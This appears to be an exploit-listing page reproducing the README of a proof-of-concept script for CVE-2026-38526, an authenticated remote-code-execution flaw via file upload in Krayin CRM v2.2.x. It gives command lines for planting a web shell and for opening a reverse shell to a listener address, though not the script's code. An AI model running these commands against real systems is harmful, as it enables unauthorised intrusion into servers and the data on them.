Share
## https://sploitus.com/exploit?id=D5B4B473-27C1-5E92-88AF-C924D7E358BD
# CVE-2026-38526 - Krayin CRM RCE

## Description
PoC script for critical vulnerability in Krayin CRM v2.2.x allowing authenticated RCE via unrestricted file upload.

## Usage
```bash
# Web shell
python3 exploit.py -u http://target.com -e admin@example.com -p password123

# Reverse shell
python3 exploit.py -u http://target.com -e admin@example.com -p password123 -l 10.10.10.10 -P 4444
```

## Requirements
- Python 3.8+
- requests, bs4

## Disclaimer
For educational purposes only.

## Reference

- https://github.com/TREXNEGRO/Security-Advisories/blob/main/CVE-2026-38526/poc.md